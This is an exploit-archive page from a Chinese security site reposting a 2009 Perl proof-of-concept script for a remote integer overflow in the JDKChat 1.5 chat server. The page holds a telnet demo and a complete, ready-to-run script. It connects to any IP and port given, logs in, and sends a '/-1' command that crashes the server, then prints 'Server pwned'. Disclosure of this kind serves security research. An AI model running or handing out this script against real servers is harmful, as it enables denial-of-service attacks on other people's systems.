首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 JDKChat 1.5 Remote Integer Overflow PoC 来源：http://www.zeroscience.org/ 作者：LiquidWorm 发布时间：2009-03-13   #!/usr/bin/perl # # Title: JDKChat v1.5 Remote Integer Overflow PoC # # Summary: JDKChat is a simple C++ chat server for GNU/Linux systems. # Users can connect to it through a simple tcp client like telnet. # # WebSite : http://www.jdkoftinoff.com/ # # ---------------------------- Demo --------------------------------- # aleks@tux ~ $ telnet 192.168.0.1 7777 # Trying 192.168.0.1... # Connected to 192.168.0.1. # Escape character is '^]'. # Welcome To jdkchat v1.5 by J.D. Koftinoff Software, Ltd. # http://www.jdkoftinoff.com/ # and modified by Aditya Godbole (urwithaditya@gmx.net) # Commands available: #    /who  --  (list all users along with their connection numbers) #    /exit  -- (exit chat room) #    /local -- (toggle local mode for your telnet session) #    /[connection number] message -- (send private message to user at #                                     specified connection number) # # #    JDKCHAT: Aleks just entered the room. #    JDKCHAT: Users = Aleks:0 # Aleks > # # # // And after we run the PoC : # #    JDKCHAT: PwNzOr just entered the room. # Aleks >Connection closed by foreign host. # aleks@tux ~ $ # # ---------------------------- /Demo -------------------------------- # # # Vulnerability discovered by n3tpr0b3 & LiquidWorm # # n3tpr0b3 [AT] gmail [.] com # # 12.03.2009 # use IO::Socket; if ($#ARGV != 1) { print "        JDKChat v1.5 Remote Integer Overflow PoC By n3tpr0b3        =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-        #        Usage : jdkchat_poc.pl SrvIP SrvPort      #        #               Greetz to LiquidWorm               #        =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\n\n"; exit; } my $dupsa = new IO::Socket::INET ( PeerAddr => "$ARGV[0]", PeerPort => "$ARGV[1]", Proto => "tcp" ) or die "Could not connect to $ARGV[0]: $!\n"; sleep 1; print $dupsa "\x50\x77\x4e\x7a\x4f\x72\x0d"; print "#--> Loged on t3h JDKChat server...\n"; sleep 1; print "#--> Sending our evil command...   \n"; sleep 2; print $dupsa "\x2f\x2d\x31\x0d"; close($dupsa); print "#--> Server pwned...               \n";   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·POP Peeper 3.4.0.0 Date Remote ·GeoVision LiveAudio ActiveX Re ·Traidnt up 2.0 (Cookie) Add Ex ·Morovia Barcode ActiveX 3.6.2 ·>Foxit Reader 3.0 (<= Build 13 ·commerce35.pair.com suffers fr ·GuildFTPd FTP Server 0.999.14 ·Serv-U 7.4.0.1 (MKD) Create Ar ·RoomPHPlanning <= 1.6 (userfor ·Serv-U 7.4.0.1 (SMNT) Denial o ·RainbowPlayer 0.91 (playlist) ·VLC 0.9.8a Web UI (input) Remo   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved